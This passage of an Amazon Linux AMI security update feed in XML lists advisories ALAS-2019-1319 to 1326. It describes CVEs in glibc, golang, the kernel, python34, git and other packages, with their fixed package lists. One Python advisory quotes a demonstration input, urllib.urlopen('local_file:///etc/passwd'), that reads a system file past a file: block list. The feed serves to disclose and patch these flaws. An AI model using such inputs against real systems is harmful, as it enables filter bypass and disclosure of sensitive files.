arch="x86_64"><filename>Packages/kernel-devel-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.152" release="98.182.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.152" release="98.182.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.152" release="98.182.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.152" release="98.182.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.152" release="98.182.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.152" release="98.182.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.152-98.182.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.152" release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.152-98.182.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.152" release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.152-98.182.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.152" release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.152-98.182.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.152" release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.152-98.182.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.152" release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.152-98.182.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.152" 
release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.152-98.182.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.152" release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.152-98.182.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.152" release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.152-98.182.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.152" release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.152-98.182.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.152" release="98.182.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.152-98.182.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1319</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1319: low priority package update for blktrace</title><issued date="2019-11-19 17:30:00" /><updated date="2019-11-22 03:22:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10689:
blktrace (aka Block IO Tracing) 1.2.0, as used with the Linux kernel and Android, has a buffer overflow in the dev_map_read function in btt/devmap.c because the device and devno arrays are too small, as demonstrated by an invalid free when using the btt program with a crafted file.
99999:
CVE-2018-10689 blktrace: buffer overflow in the dev_map_read function in btt/devmap.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10689" title="" id="CVE-2018-10689" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="blktrace-debuginfo" version="1.0.5" release="9.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/blktrace-debuginfo-1.0.5-9.16.amzn1.x86_64.rpm</filename></package><package name="blktrace" version="1.0.5" release="9.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/blktrace-1.0.5-9.16.amzn1.x86_64.rpm</filename></package><package name="blktrace" version="1.0.5" release="9.16.amzn1" epoch="0" arch="i686"><filename>Packages/blktrace-1.0.5-9.16.amzn1.i686.rpm</filename></package><package name="blktrace-debuginfo" version="1.0.5" release="9.16.amzn1" epoch="0" arch="i686"><filename>Packages/blktrace-debuginfo-1.0.5-9.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1320</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1320: medium priority package update for glibc</title><issued date="2019-11-19 17:30:00" /><updated date="2019-11-22 03:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-10739:
In the GNU C Library (aka glibc or libc6) through 2.28, the getaddrinfo function would successfully parse a string that contained an IPv4 address followed by whitespace and arbitrary characters, which could lead applications to incorrectly assume that it had parsed a valid string, without the possibility of embedded HTTP headers or other potentially dangerous substrings.
99999:
CVE-2016-10739 glibc: getaddrinfo should reject IP addresses with trailing characters
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10739" title="" id="CVE-2016-10739" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-static" version="2.17" release="292.178.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-292.178.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="292.178.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-292.178.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="292.178.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-292.178.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="292.178.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-292.178.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="292.178.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-292.178.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="292.178.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-292.178.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="292.178.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-292.178.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="292.178.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-292.178.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="292.178.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-292.178.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="292.178.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-292.178.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" 
release="292.178.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-292.178.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="292.178.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-292.178.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="292.178.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-292.178.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="292.178.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-292.178.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="292.178.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-292.178.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="292.178.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-292.178.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="292.178.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-292.178.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="292.178.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-292.178.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1321</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1321: medium priority package update for golang</title><issued date="2019-11-19 17:31:00" /><updated date="2019-11-22 03:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-16276:
It was discovered that net/http (through net/textproto) in golang does not correctly interpret HTTP requests where an HTTP header contains spaces before the colon. This could be abused by an attacker to smuggle HTTP requests when a proxy or a firewall is placed behind a server implemented in Go, or to bypass filters, depending on the specific network configuration.
99999:
CVE-2019-16276 golang: HTTP/1.1 headers with a space before the colon leads to filter bypass or request smuggling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16276" title="" id="CVE-2019-16276" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang" version="1.12.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.12.8-1.52.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.12.8" release="1.52.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.12.8-1.52.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.12.8" release="1.52.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.12.8-1.52.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.12.8" release="1.52.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.12.8-1.52.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.12.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.12.8-1.52.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.12.8" release="1.52.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.12.8-1.52.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.12.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.12.8-1.52.amzn1.x86_64.rpm</filename></package><package name="golang-bin" version="1.12.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.12.8-1.52.amzn1.i686.rpm</filename></package><package name="golang" version="1.12.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.12.8-1.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1322</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1322: important priority package update for 
kernel</title><issued date="2019-11-19 17:31:00" /><updated date="2019-11-22 19:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-12207:
A flaw was found in the way Intel CPUs handle inconsistency between virtual to physical memory address translations in the CPU&#039;s local cache and system software&#039;s paging structure entries. A privileged guest user may use this flaw to induce a hardware Machine Check Error on the host processor, resulting in a severe DoS scenario by halting the processor.

System software like an OS or Virtual Machine Monitor (VMM) uses the virtual memory system for storing program instructions and data in memory. The virtual memory system uses paging structures like page tables and page directories to manage system memory. The processor&#039;s Memory Management Unit (MMU) uses paging structure entries to translate a program&#039;s virtual memory addresses to physical memory addresses. The processor stores these address translations in its local cache buffer called the Translation Lookaside Buffer (TLB). The TLB has two parts, one for instruction addresses and the other for data addresses.

System software can modify its paging structure entries to change address mappings or certain attributes like page size. Upon such paging structure alterations in memory, system software must invalidate the corresponding address translations in the processor&#039;s TLB cache. But before this TLB invalidation takes place, a privileged guest user may trigger an instruction fetch operation, which could use an already cached, but now invalid, virtual to physical address translation from the Instruction TLB (ITLB), thus accessing an invalid physical memory address and halting the processor due to the Machine Check Error (MCE) on Page Size Change.
99999:
CVE-2018-12207 hw: Machine Check Error on Page Size Change (IFU)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12207" title="" id="CVE-2018-12207" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.154" release="99.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.154" release="99.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.154" release="99.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.154" release="99.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.154" release="99.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.154" release="99.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.154" release="99.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.154" release="99.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.154" release="99.181.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.154" release="99.181.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-debuginfo-4.14.154-99.181.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.154-99.181.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.154-99.181.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.154-99.181.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.154-99.181.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.154-99.181.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.154-99.181.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.154-99.181.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.154-99.181.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.154-99.181.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.154" release="99.181.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.154-99.181.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1323</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1323: medium priority package update for libapreq2</title><issued date="2019-11-19 17:31:00" /><updated date="2019-11-22 03:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-12412:
99999:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12412" title="" id="CVE-2019-12412" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libapreq2-libs" version="2.13" release="38.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/libapreq2-libs-2.13-38.2.amzn1.x86_64.rpm</filename></package><package name="libapreq2" version="2.13" release="38.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/libapreq2-2.13-38.2.amzn1.x86_64.rpm</filename></package><package name="libapreq2-debuginfo" version="2.13" release="38.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/libapreq2-debuginfo-2.13-38.2.amzn1.x86_64.rpm</filename></package><package name="libapreq2-devel" version="2.13" release="38.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/libapreq2-devel-2.13-38.2.amzn1.x86_64.rpm</filename></package><package name="perl-libapreq2" version="2.13" release="38.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-libapreq2-2.13-38.2.amzn1.x86_64.rpm</filename></package><package name="libapreq2-libs" version="2.13" release="38.2.amzn1" epoch="0" arch="i686"><filename>Packages/libapreq2-libs-2.13-38.2.amzn1.i686.rpm</filename></package><package name="libapreq2" version="2.13" release="38.2.amzn1" epoch="0" arch="i686"><filename>Packages/libapreq2-2.13-38.2.amzn1.i686.rpm</filename></package><package name="libapreq2-debuginfo" version="2.13" release="38.2.amzn1" epoch="0" arch="i686"><filename>Packages/libapreq2-debuginfo-2.13-38.2.amzn1.i686.rpm</filename></package><package name="libapreq2-devel" version="2.13" release="38.2.amzn1" epoch="0" arch="i686"><filename>Packages/libapreq2-devel-2.13-38.2.amzn1.i686.rpm</filename></package><package name="perl-libapreq2" version="2.13" release="38.2.amzn1" epoch="0" arch="i686"><filename>Packages/perl-libapreq2-2.13-38.2.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" 
version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1324</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1324: important priority package update for python34</title><issued date="2019-11-19 17:31:00" /><updated date="2019-11-22 03:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9948:
urllib in Python 2.x through 2.7.16 supports the local_file: scheme, which makes it easier for remote attackers to bypass protection mechanisms that blacklist file: URIs, as demonstrated by triggering a urllib.urlopen(&#039;local_file:///etc/passwd&#039;) call.
1695570:
CVE-2019-9948 python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms
CVE-2019-9947:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the path component of a URL that lacks a ? character) followed by an HTTP header or a Redis command. This is similar to the CVE-2019-9740 query string issue.
1695572:
CVE-2019-9947 python: improper neutralization of CRLF sequences in urllib module
1695572:
CVE-2019-9947 python: CRLF injection via the path part of the url passed to urlopen()
CVE-2019-9740:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the query string after a ? character) followed by an HTTP header or a Redis command.
1688169:
CVE-2019-9740 python: improper neutralization of CRLF sequences in urllib module
1688169:
CVE-2019-9740 python: CRLF injection via the query part of the url passed to urlopen()
CVE-2019-9636:
Python 2.7.x through 2.7.16 and 3.x through 3.7.2 is affected by: Improper Handling of Unicode Encoding (with an incorrect netloc) during NFKC normalization. The impact is: Information disclosure (credentials, cookies, etc. that are cached against a given hostname). The components are: urllib.parse.urlsplit, urllib.parse.urlparse. The attack vector is: A specially crafted URL could be incorrectly parsed to locate cookies or authentication data and send that information to a different host than when parsed correctly.
1688543:
CVE-2019-9636 python: Information Disclosure due to urlsplit improper NFKC normalization
CVE-2019-16056:
An issue was discovered in Python through 2.7.16, 3.x through 3.5.7, 3.6.x through 3.6.9, and 3.7.x through 3.7.4. The email module wrongly parses email addresses that contain multiple @ characters. An application that uses the email module and implements some kind of checks on the From/To headers of a message could be tricked into accepting an email address that should be denied. An attack may be the same as in CVE-2019-11340; however, this CVE applies to Python more generally.
99999:
CVE-2019-16056 python: email.utils.parseaddr wrongly parses email addresses
CVE-2019-10160:
A security regression of CVE-2019-9636 was discovered in python, since commit d537ab0ff9767ef024f26246899728f0116b1ec3, which still allows an attacker to exploit CVE-2019-9636 by abusing the user and password parts of a URL. When an application parses user-supplied URLs to store cookies, authentication credentials, or other kind of information, it is possible for an attacker to provide specially crafted URLs to make the application locate host-related information (e.g. cookies, authentication data) and send them to a different host than where it should, unlike if the URLs had been correctly parsed. The result of an attack may vary based on the application.
1718388:
CVE-2019-10160 python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10160" title="" id="CVE-2019-10160" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16056" title="" id="CVE-2019-16056" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9636" title="" id="CVE-2019-9636" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9740" title="" id="CVE-2019-9740" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9947" title="" id="CVE-2019-9947" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9948" title="" id="CVE-2019-9948" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34-debuginfo" version="3.4.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.49.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.49.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.49.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.49.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.49.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.49.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.49.amzn1" epoch="0" 
arch="i686"><filename>Packages/python34-devel-3.4.10-1.49.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.49.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.49.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.49.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.10-1.49.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.10-1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1325</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1325: important priority package update for git</title><issued date="2019-12-09 22:06:00" /><updated date="2019-12-11 05:55:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-1387:
99999:
CVE-2019-1354:
99999:
CVE-2019-1353:
99999:
CVE-2019-1352:
99999:
CVE-2019-1351:
99999:
CVE-2019-1350:
99999:
CVE-2019-1349:
99999:
CVE-2019-1348:
99999:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1348" title="" id="CVE-2019-1348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1349" title="" id="CVE-2019-1349" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1350" title="" id="CVE-2019-1350" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1351" title="" id="CVE-2019-1351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1352" title="" id="CVE-2019-1352" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1353" title="" id="CVE-2019-1353" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1354" title="" id="CVE-2019-1354" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1387" title="" id="CVE-2019-1387" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-svn" version="2.14.6" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.14.6-1.61.amzn1.x86_64.rpm</filename></package><package name="perl-Git" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.14.6" release="1.61.amzn1" epoch="0" 
arch="noarch"><filename>Packages/perl-Git-SVN-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.14.6" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.14.6-1.61.amzn1.x86_64.rpm</filename></package><package name="git-all" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.14.6" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.14.6-1.61.amzn1.x86_64.rpm</filename></package><package name="emacs-git" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="git" version="2.14.6" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.14.6-1.61.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.14.6" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.14.6-1.61.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.14.6" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.14.6-1.61.amzn1.i686.rpm</filename></package><package name="git" version="2.14.6" release="1.61.amzn1" epoch="0" 
arch="i686"><filename>Packages/git-2.14.6-1.61.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.14.6" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.14.6-1.61.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1326</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1326: medium priority package update for file</title><issued date="2019-12-13 21:12:00" /><updated date="2019-12-19 18:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18218:
cdf_read_property_info in cdf.c in file through 5.37 does not restrict the number of CDF_VECTOR elements, which allows a heap-based buffer overflow (4-byte out-of-bounds write).
99999:
CVE-2019-18218 file: heap-based buffer overflow in cdf_read_property_info in cdf.c
